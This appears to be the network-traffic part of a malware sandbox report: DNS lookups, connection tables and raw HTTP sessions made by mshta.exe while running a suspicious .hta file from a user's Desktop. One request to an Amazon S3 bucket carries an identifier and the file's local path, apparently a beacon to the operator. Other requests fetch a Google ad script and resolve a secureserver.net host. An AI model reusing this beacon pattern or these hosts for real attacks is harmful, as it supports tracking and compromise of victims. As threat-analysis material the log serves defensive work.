                                                                                                                                                                                                                                      Dec 23, 2024 10:41:32.557145119 CET49847443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:32.561707020 CET49847443192.168.2.24172.217.19.194
                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:12.019571066 CET5778153192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:12.157300949 CET53577811.1.1.1192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:13.031500101 CET5778153192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:14.299233913 CET5936953192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.780314922 CET5936953192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.783857107 CET5951353192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.790144920 CET4921353192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.831651926 CET6476953192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.917182922 CET53593691.1.1.1192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.079343081 CET6476953192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.103732109 CET4921353192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.310117960 CET53492131.1.1.1192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET53647691.1.1.1192.168.2.24
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:24.340804100 CET5951353192.168.2.241.1.1.1
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:24.479764938 CET53595131.1.1.1192.168.2.24
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:12.019571066 CET192.168.2.241.1.1.10xad05Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:13.031500101 CET192.168.2.241.1.1.10xd904Standard query (0)srtb.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:14.299233913 CET192.168.2.241.1.1.10x23beStandard query (0)tse1.mm.bing.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.780314922 CET192.168.2.241.1.1.10xc8b0Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.783857107 CET192.168.2.241.1.1.10x2408Standard query (0)www.americanas.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.790144920 CET192.168.2.241.1.1.10xbc4aStandard query (0)images-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.831651926 CET192.168.2.241.1.1.10x6cb4Standard query (0)statics-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.079343081 CET192.168.2.241.1.1.10x40cbStandard query (0)logs-referer.s3-sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.103732109 CET192.168.2.241.1.1.10xd522Standard query (0)s3-sa-east-1.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:24.340804100 CET192.168.2.241.1.1.10xa4efStandard query (0)102.57.205.92.host.secureserver.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:12.157300949 CET1.1.1.1192.168.2.240xad05No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:12.157300949 CET1.1.1.1192.168.2.240xad05No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:13.170066118 CET1.1.1.1192.168.2.240xd904No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:13.170066118 CET1.1.1.1192.168.2.240xd904No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:14.437196016 CET1.1.1.1192.168.2.240x23beNo error (0)tse1.mm.bing.netmm-mm.bing.net.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:14.437196016 CET1.1.1.1192.168.2.240x23beNo error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:40:14.437196016 CET1.1.1.1192.168.2.240x23beNo error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:00.917182922 CET1.1.1.1192.168.2.240xc8b0No error (0)securepubads.g.doubleclick.net172.217.19.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:01.184556007 CET1.1.1.1192.168.2.240x6cb4No error (0)statics-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:01.184576035 CET1.1.1.1192.168.2.240xbc4aNo error (0)images-americanas.b2w.iosni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:01.200165033 CET1.1.1.1192.168.2.240x2408No error (0)www.americanas.com.brsni-wildsan.b2wdigital.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.310117960 CET1.1.1.1192.168.2.240xd522No error (0)s3-sa-east-1.amazonaws.com16.12.2.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.310117960 CET1.1.1.1192.168.2.240xd522No error (0)s3-sa-east-1.amazonaws.com16.12.2.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.310117960 CET1.1.1.1192.168.2.240xd522No error (0)s3-sa-east-1.amazonaws.com3.5.234.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.310117960 CET1.1.1.1192.168.2.240xd522No error (0)s3-sa-east-1.amazonaws.com16.12.0.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.310117960 CET1.1.1.1192.168.2.240xd522No error (0)s3-sa-east-1.amazonaws.com52.95.165.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.310117960 CET1.1.1.1192.168.2.240xd522No error (0)s3-sa-east-1.amazonaws.com16.12.0.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.310117960 CET1.1.1.1192.168.2.240xd522No error (0)s3-sa-east-1.amazonaws.com52.95.164.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET1.1.1.1192.168.2.240x40cbNo error (0)logs-referer.s3-sa-east-1.amazonaws.coms3-r-w.sa-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET1.1.1.1192.168.2.240x40cbNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET1.1.1.1192.168.2.240x40cbNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET1.1.1.1192.168.2.240x40cbNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET1.1.1.1192.168.2.240x40cbNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.0.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET1.1.1.1192.168.2.240x40cbNo error (0)s3-r-w.sa-east-1.amazonaws.com52.95.165.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET1.1.1.1192.168.2.240x40cbNo error (0)s3-r-w.sa-east-1.amazonaws.com16.12.1.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET1.1.1.1192.168.2.240x40cbNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.233.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:23.444118977 CET1.1.1.1192.168.2.240x40cbNo error (0)s3-r-w.sa-east-1.amazonaws.com3.5.232.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Dec 23, 2024 10:41:24.479764938 CET1.1.1.1192.168.2.240xa4efNo error (0)102.57.205.92.host.secureserver.net92.205.57.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      • securepubads.g.doubleclick.net
                                                                                                                                                                                                                                      • s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                                      • logs-referer.s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                                      • 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.2449794172.217.19.1944433360C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-23 09:41:02 UTC348OUTGET /tag/js/gpt.js HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Language: en-CH,en-US;q=0.7,en;q=0.3
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                      Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 09:41:03 GMT
                                                                                                                                                                                                                                      Expires: Mon, 23 Dec 2024 09:41:03 GMT
                                                                                                                                                                                                                                      Cache-Control: private, max-age=900, stale-while-revalidate=3600
                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                      ETag: 407 / 20080 / m202412090101 / config-hash: 16775640167977932469
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                      Server: cafe
                                                                                                                                                                                                                                      Content-Length: 105873
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC603INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 73 74 74 63 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 29 7b 67 6f 6f 67 6c 65 74 61 67 2e 65 76 61 6c 53 63 72 69 70 74 73 28 29 3b 7d 69 66 28 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 26 26 67 6f 6f 67 6c 65 74 61 67 2e 5f 6c 6f 61 64 65 64 5f 29 72 65 74 75 72 6e 3b 76 61 72 20 6e 2c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 2c 62 61 3d 74 79 70 65
                                                                                                                                                                                                                                      Data Ascii: (function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=type
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC1390INData Raw: 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 2c 64 61 3d 63 61 28 74 68 69 73 29 2c 65 61 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 28 22 78 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 2c 74 3d 7b 7d 2c 66 61 3d 7b 7d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 63 7c 7c 61 21 3d 6e 75 6c 6c 29 7b 63 3d 66 61 5b 62 5d 3b 69 66 28 63 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 5b 62 5d 3b 63 3d 61 5b 63 5d 3b 72 65 74 75 72 6e 20 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 61 5b 62 5d 7d 7d 2c 77 3d 66 75 6e
                                                                                                                                                                                                                                      Data Ascii: &&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},u=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=fun
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC1390INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 61 28 61 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 75 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 2c 69 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 6a 61 3b 69
                                                                                                                                                                                                                                      Data Ascii: :function(){return ha(aa(this))}})}return a},"es6");var ha=function(a){a={next:a};a[u(t.Symbol,"iterator")]=function(){return this};return a},ia=typeof Object.create=="function"?Object.create:function(a){var b=function(){};b.prototype=a;return new b},ja;i
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC1390INData Raw: 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 31 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 64 29 66 6f 72 28 76 61 72 20 65 20 69 6e 20 64 29 71 61 28 64 2c 65 29 26 26 28 61 5b 65 5d 3d 64 5b 65 5d 29 7d 72 65 74 75 72 6e 20 61 7d 3b 77 28 22 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 73 61 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 74 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                                      Data Ascii: on(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)qa(d,e)&&(a[e]=d[e])}return a};w("Object.assign",function(a){return a||sa},"es6");var ta=function(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC1390INData Raw: 2e 67 29 3f 64 65 6c 65 74 65 20 67 5b 64 5d 5b 74 68 69 73 2e 67 5d 3a 21 31 7d 3b 72 65 74 75 72 6e 20 66 7d 2c 22 65 73 36 22 29 3b 77 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 75 28 61 2e 70 72 6f 74 6f 74 79 70 65 2c 22 65 6e 74 72 69 65 73 22 29 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 7a 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c
                                                                                                                                                                                                                                      Data Ascii: .g)?delete g[d][this.g]:!1};return f},"es6");w("Map",function(a){if(function(){if(!a||typeof a!="function"||!u(a.prototype,"entries")||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(z([[h,"s"]]));if(k.get(h)!="s"||k.size!=1||
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC1390INData Raw: 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 6b 65 79 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 2e 76 61 6c 75 65 7d 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 75 28 74 68 69 73 2c 22 65 6e 74 72 69 65 73 22 29 2e 63 61 6c 6c 28 74 68 69 73 29 2c 70 3b 21 28 70 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 70 3d 70 2e 76 61 6c 75 65 2c 68 2e 63 61 6c 6c 28 6b 2c 70 5b 31 5d 2c 70 5b 30 5d 2c 74 68 69 73 29 7d 3b 63 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                      Data Ascii: turn e(this,function(h){return h.key})};c.prototype.values=function(){return e(this,function(h){return h.value})};c.prototype.forEach=function(h,k){for(var l=u(this,"entries").call(this),p;!(p=l.next()).done;)p=p.value,h.call(k,p[1],p[0],this)};c.prototyp
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC1390INData Raw: 29 2e 64 6f 6e 65 3b 29 74 68 69 73 2e 61 64 64 28 64 2e 76 61 6c 75 65 29 7d 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 63 3d 3d 3d 30 3f 30 3a 63 3b 74 68 69 73 2e 67 2e 73 65 74 28 63 2c 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 63 3d 74 68 69 73 2e 67 2e 64 65 6c 65 74 65 28 63 29 3b 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 67 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 63 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73
                                                                                                                                                                                                                                      Data Ascii: ).done;)this.add(d.value)}this.size=this.g.size};b.prototype.add=function(c){c=c===0?0:c;this.g.set(c,c);this.size=this.g.size;return this};b.prototype.delete=function(c){c=this.g.delete(c);this.size=this.g.size;return c};b.prototype.clear=function(){this
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC1390INData Raw: 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 77 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 75 61 28 74 68 69 73 2c 62 2c 22 69 6e 63 6c 75 64 65 73 22 29 2e 69 6e 64 65 78 4f 66 28 62 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 2c 22 65 73 36 22 29 3b 77 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66
                                                                                                                                                                                                                                      Data Ascii: ular expression");return a+""};w("String.prototype.includes",function(a){return a?a:function(b,c){return ua(this,b,"includes").indexOf(b,c||0)!==-1}},"es6");w("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],f
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC1390INData Raw: 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 67 3e 3d 66 7d 7d 2c 22 65 73 36 22 29 3b 76 61 72 20 76 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 2b 3d 22 22 29 3b 76 61 72 20 63 3d 30 2c 64 3d 21 31 2c 65 3d 7b 6e 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 64 26 26 63 3c 61 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 66 3d 63 2b 2b 3b 72 65 74 75 72 6e 7b 76 61 6c 75 65 3a 62 28 66 2c 61 5b 66 5d 29 2c 64 6f 6e 65 3a 21 31 7d 7d 64 3d 21 30 3b 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 7d 3b 65 5b 75 28 74 2e 53 79 6d 62 6f 6c 2c 22 69 74 65 72 61 74 6f 72 22 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 3b 72
                                                                                                                                                                                                                                      Data Ascii: turn!1;return g>=f}},"es6");var va=function(a,b){a instanceof String&&(a+="");var c=0,d=!1,e={next:function(){if(!d&&c<a.length){var f=c++;return{value:b(f,a[f]),done:!1}}d=!0;return{done:!0,value:void 0}}};e[u(t.Symbol,"iterator")]=function(){return e};r
                                                                                                                                                                                                                                      2024-12-23 09:41:03 UTC1390INData Raw: 7b 76 61 72 20 63 3d 77 61 28 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 29 3b 61 3d 63 26 26 63 5b 61 5d 3b 72 65 74 75 72 6e 20 61 21 3d 6e 75 6c 6c 3f 61 3a 62 7d 2c 77 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 42 2c 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 69 66 28 62 3d 62 5b 61 5b 63 5d 5d 2c 62 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 62 7d 2c 79 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 61 3b 72 65 74 75 72 6e 20 62 21 3d 22 6f 62 6a 65 63 74 22 3f 62 3a 61 3f 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 22 61 72 72 61 79 22 3a 62 3a 22 6e 75 6c 6c 22 7d 2c 7a 61 3d 66 75 6e
                                                                                                                                                                                                                                      Data Ascii: {var c=wa("CLOSURE_FLAGS");a=c&&c[a];return a!=null?a:b},wa=function(a){a=a.split(".");for(var b=B,c=0;c<a.length;c++)if(b=b[a[c]],b==null)return null;return b},ya=function(a){var b=typeof a;return b!="object"?b:a?Array.isArray(a)?"array":b:"null"},za=fun


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1192.168.2.244983716.12.2.364433360C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-23 09:41:25 UTC468OUTGET /frame-image-br/bg.png?x-id=102d82f99a6f9cf9056d901bddf67848&x-r=&x-s=file:///C:/Users/user/Desktop/Archivo-PxFkiLTWYG-23122024095010.hta HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Accept-Language: en-CH,en-US;q=0.7,en;q=0.3
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                                                      Host: s3-sa-east-1.amazonaws.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      2024-12-23 09:41:25 UTC535INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      x-amz-id-2: 3R1L5DXFzPfh8gN3FxWLZG8yZR8rkMj8XaRQIYwhUk/iBqVYqll2C49kf9/xjIsfRqpBjP8ezEE=
                                                                                                                                                                                                                                      x-amz-request-id: 8D2BJ2EQS1QGVZHF
                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 09:41:26 GMT
                                                                                                                                                                                                                                      Last-Modified: Thu, 04 May 2017 08:21:21 GMT
                                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
